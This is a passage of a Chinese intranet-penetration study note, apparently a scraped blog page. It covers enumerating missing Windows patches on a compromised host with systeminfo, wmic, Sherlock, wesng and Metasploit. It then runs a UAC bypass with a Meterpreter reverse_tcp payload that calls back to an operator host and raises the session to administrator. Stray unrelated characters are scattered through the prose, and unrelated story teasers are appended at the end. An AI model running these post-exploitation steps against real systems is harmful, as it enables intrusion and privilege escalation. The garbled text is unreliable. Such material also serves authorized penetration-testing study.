【內(nèi)網(wǎng)學(xué)習(xí)筆記】14啄栓、發(fā)現(xiàn)主機缺失補丁

0娄帖、前言

在內(nèi)網(wǎng)中，往往所有主機打補丁的情況都是相似的昙楚，因此在拿下一臺主機權(quán)限后近速，可以通過查看當(dāng)前主機打補丁的情況，從而找到漏洞利用點桂肌，進而進行接下來的橫向数焊、提權(quán)等操作。

1崎场、手工發(fā)現(xiàn)缺失補丁

systeminfo

直接運行 systeminfo 命令佩耳，在「修補程序」（英文：Hotfix(s) ）處可以看到已安裝的補丁。

C:\Users\teamssix> systeminfo
……內(nèi)容過多谭跨，此處省略……
修補程序: 安裝了 2 個修補程序干厚。
         [01]: KB2999226
         [02]: KB976902
……內(nèi)容過多李滴，此處省略……

wmic

運行以下命令，同樣可以看到當(dāng)前系統(tǒng)打補丁的情況蛮瞄，顯示的信息比 systeminfo 更詳細(xì)直觀所坯。

wmic qfe get Caption,Description,HotfixID,InstalledOn

C:\Users\teamssix>wmic qfe get Caption,Description,HotfixID,InstalledOn

Caption                                     Description  HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2999226  Update       KB2999226  11/26/2020
http://support.microsoft.com/?kbid=976902   Update       KB976902   11/21/2010

知道了系統(tǒng)安裝了哪些補丁，也就能反推出系統(tǒng)可能存在的漏洞了挂捅。

2芹助、自動發(fā)現(xiàn)缺失補丁

Sherlock 腳本

Sherlock 是一個在 Windows 下能夠快速發(fā)現(xiàn)目標(biāo)系統(tǒng)可能存在可被用于提權(quán)的漏洞的 PowerShell 腳本。

Sherlock 項目地址：https://github.com/rasta-mouse/Sherlock

導(dǎo)入腳本

Import-Module .\Sherlock.ps1

Sherlock 命令

Find-ALLVulns   搜索所有未安裝的補丁
Find-MS16032    搜索單個漏洞

Metasploit

在已經(jīng)獲取到目標(biāo)會話后闲先，比如這里的會話 Seesion ID 為 1状土，使用 post/windows/gather/enum_patches 模塊可直接查看當(dāng)前系統(tǒng)補丁信息。

msf6 exploit(multi/handler) > use post/windows/gather/enum_patches

msf6 post(windows/gather/enum_patches) > set session 1
session => 1

msf6 post(windows/gather/enum_patches) > run
[+] KB2999226 installed on 11/26/2020
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed

或者使用 MSF 發(fā)現(xiàn)目標(biāo)可用提權(quán)漏洞伺糠，然后進行提權(quán)

首先查看下當(dāng)前會話權(quán)限

msf6 post(windows/gather/enum_patches) > sessions 1
[*] Starting interaction with 1...

meterpreter > execute -if "whoami /groups"
Process 3048 created.
Channel 6 created.

組信息
-----------------

組名                                   類型   SID          屬性
====================================== ====== ============ ==============================
Everyone                               已知組 S-1-1-0      必需的組, 啟用于默認(rèn), 啟用的組
BUILTIN\Administrators                 別名   S-1-5-32-544 只用于拒絕的組
BUILTIN\Users                          別名   S-1-5-32-545 必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\INTERACTIVE               已知組 S-1-5-4      必需的組, 啟用于默認(rèn), 啟用的組
控制臺登錄                             已知組 S-1-2-1      必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\Authenticated Users       已知組 S-1-5-11     必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\This Organization         已知組 S-1-5-15     必需的組, 啟用于默認(rèn), 啟用的組
LOCAL                                  已知組 S-1-2-0      必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\NTLM Authentication       已知組 S-1-5-64-10  必需的組, 啟用于默認(rèn), 啟用的組
Mandatory Label\Medium Mandatory Level 標(biāo)簽   S-1-16-8192  必需的組, 啟用于默認(rèn), 啟用的組

可以看到當(dāng)前權(quán)限為 Medium Mandatory Level蒙谓，即普通權(quán)限

我們使用 post/multi/recon/local_exploit_suggester 模塊檢測下當(dāng)前系統(tǒng)可利用的提權(quán)漏洞

meterpreter > background
[*] Backgrounding session 1...

msf6 post(windows/gather/enum_patches) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 172.16.214.4 - Collecting local exploits for x86/windows...
[*] 172.16.214.4 - 38 exploit checks are being tried...
[+] 172.16.214.4 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[*] Post module execution completed

可以看到提示存在 exploit/windows/local/bypassuac_eventvwr 模塊可被利用

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_eventvwr
[*] Using configured payload windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1

msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.101.22.38:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 172.16.214.4
[*] Meterpreter session 2 opened (10.101.22.38:4444 -> 172.16.214.4:49160) at 2021-07-06 15:38:08 +0800
[*] Cleaning up registry keys ...

meterpreter > execute -if "whoami /groups"
Process 3048 created.
Channel 1 created.

組信息
-----------------

組名                                 類型   SID          屬性
==================================== ====== ============ ==========================================
Everyone                             已知組 S-1-1-0      必需的組, 啟用于默認(rèn), 啟用的組
BUILTIN\Administrators               別名   S-1-5-32-544 必需的組, 啟用于默認(rèn), 啟用的組, 組的所有者
BUILTIN\Users                        別名   S-1-5-32-545 必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\INTERACTIVE             已知組 S-1-5-4      必需的組, 啟用于默認(rèn), 啟用的組
控制臺登錄                           已知組 S-1-2-1      必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\Authenticated Users     已知組 S-1-5-11     必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\This Organization       已知組 S-1-5-15     必需的組, 啟用于默認(rèn), 啟用的組
LOCAL                                已知組 S-1-2-0      必需的組, 啟用于默認(rèn), 啟用的組
NT AUTHORITY\NTLM Authentication     已知組 S-1-5-64-10  必需的組, 啟用于默認(rèn), 啟用的組
Mandatory Label\High Mandatory Level 標(biāo)簽   S-1-16-12288 必需的組, 啟用于默認(rèn), 啟用的組

可以看到，使用 exploit/windows/local/bypassuac_eventvwr 模塊直接將目標(biāo)權(quán)限提升到了 High Mandatory Level训桶，即管理員權(quán)限累驮，這里可以說 MSF 很方便了。

wesng

wesng 被稱為 Windows Exploit Suggester 的下一代舵揭，wesng 和 Windows Exploit Suggester 的使用方法基本一致谤专，但 wesng 所支持的操作系統(tǒng)更豐富，不過實測 wesng 還未支持 Windows 11 『手動狗頭』

wesng 的安裝方法也很簡單

git clone https://github.com/bitsadmin/wesng.git
cd wesng
python wes.py --update

使用起來也很簡單琉朽，直接在目標(biāo)主機上運行以下命令毒租，將 systeminfo 的信息保存到 txt 中。

systeminfo > info.txt

直接使用 wesng 即可

python wes.py info.txt

image

使用 wesng 可以直接看到目標(biāo)主機可能存在的 CVE 漏洞箱叁，從而便于我們有針對性的利用這些漏洞。

原文鏈接：
https://teamssix.com/year/210706-155005.html

參考文章：

https://cloud.tencent.com/developer/article/1043370

https://blog.csdn.net/nathan8/article/details/108804056

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末惕医，一起剝皮案震驚了整個濱河市耕漱，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌抬伺，老刑警劉巖螟够，帶你破解...
沈念sama閱讀 218,640評論 6贊 507
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異峡钓，居然都是意外死亡妓笙，警方通過查閱死者的電腦和手機，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 93,254評論 3贊 395
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進店門能岩，熙熙樓的掌柜王于貴愁眉苦臉地迎上來寞宫，“玉大人，你說我怎么就攤上這事拉鹃”哺常” “怎么了鲫忍？”我有些...
開封第一講書人閱讀 165,011評論 0贊 355
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長钥屈。經(jīng)常有香客問我悟民，道長，這世上最難降的妖魔是什么篷就？我笑而不...
開封第一講書人閱讀 58,755評論 1贊 294
?港島之戀（遺憾婚禮）
正文為了忘掉前任射亏，我火速辦了婚禮，結(jié)果婚禮上竭业，老公的妹妹穿的比我還像新娘鸦泳。我一直安慰自己，他們只是感情好永品，可當(dāng)我...
茶點故事閱讀 67,774評論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布做鹰。她就那樣靜靜地躺著，像睡著了一般鼎姐。火紅的嫁衣襯著肌膚如雪钾麸。梳的紋絲不亂的頭發(fā)上，一...
開封第一講書人閱讀 51,610評論 1贊 305
城市分裂傳說
那天炕桨，我揣著相機與錄音饭尝，去河邊找鬼。笑死献宫，一個胖子當(dāng)著我的面吹牛钥平，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播姊途，決...
沈念sama閱讀 40,352評論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼涉瘾，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了捷兰？” 一聲冷哼從身側(cè)響起立叛，我...
開封第一講書人閱讀 39,257評論 0贊 276
萬榮殺人案實錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎贡茅，沒想到半個月后秘蛇，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 45,717評論 1贊 315
?護林員之死
正文獨居荒郊野嶺守林人離奇死亡顶考，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點故事閱讀 37,894評論 3贊 336
?白月光啟示錄
正文我和宋清朗相戀三年赁还，在試婚紗的時候發(fā)現(xiàn)自己被綠了。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片驹沿。...
茶點故事閱讀 40,021評論 1贊 350
活死人
序言：一個原本活蹦亂跳的男人離奇死亡艘策，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出甚负，到底是詐尸還是另有隱情柬焕，我是刑警寧澤审残，帶...
沈念sama閱讀 35,735評論 5贊 346
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站斑举，受9級特大地震影響搅轿，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜富玷，卻給世界環(huán)境...
茶點故事閱讀 41,354評論 3贊 330
男人毒藥：我在死后第九天來索命
文/蒙蒙一璧坟、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧赎懦，春花似錦雀鹃、人聲如沸。這莊子的主人今日做“春日...
開封第一講書人閱讀 31,936評論 0贊 22
一樁弒父案黎茎，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽。三九已至当悔，卻和暖如春傅瞻，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背盲憎。一陣腳步聲響...
開封第一講書人閱讀 33,054評論 1贊 270
情欲美人皮
我被黑心中介騙來泰國打工嗅骄，沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留，地道東北人饼疙。一個月前我還...
沈念sama閱讀 48,224評論 3贊 371
代替公主和親
正文我出身青樓溺森，卻偏偏與公主長得像，于是被迫代替她去往敵國和親窑眯。傳聞我的和親對象是個殘疾皇子屏积，可洞房花燭夜當(dāng)晚...
茶點故事閱讀 44,974評論 2贊 355

【內(nèi)網(wǎng)學(xué)習(xí)筆記】14、發(fā)現(xiàn)主機缺失補丁